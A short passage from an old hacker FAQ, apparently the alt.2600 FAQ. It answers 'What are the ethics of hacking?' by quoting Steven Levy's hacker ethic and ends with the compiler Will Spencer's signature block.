  4176.  
  4177.  
  4178. 04. What are the ethics of hacking?
  4179.  
  4180. The FAQ answer is excerpted from: Hackers: Heroes of the Computer Revolution
  4181.                   by Steven Levy
  4182.  
  4183. Access to computers -- and anything which might teach you something
  4184. about the way the world works -- should be unlimited and total.
  4185. Always yield to the Hands-On imperative.
  4186.  
  4187. All information should be free.
  4188.  
  4189. Mistrust Authority.  Promote Decentralization.
  4190.  
  4191. Hackers should be judged by their hacking, not bogus criteria such as
  4192. degrees, age, race, or position.
  4193.  
  4194. You can create art and beauty on a computer.
  4195.  
  4196. Computers can change your life for the better.
  4197.  
  4198.  
  4199.  
  4200.  
  4201. EOT
  4202.  
  4203. -- 
  4204. \* Will Spencer        : The advancement and diffusion of knowledge *\
  4205. \* Unix geek           : is the only guardian of true liberty.      *\
  4206. \* PC guru             :               --  James Madison            *\
  4207. \* Revolutionary       :               4th U.S. President           *\
  4208.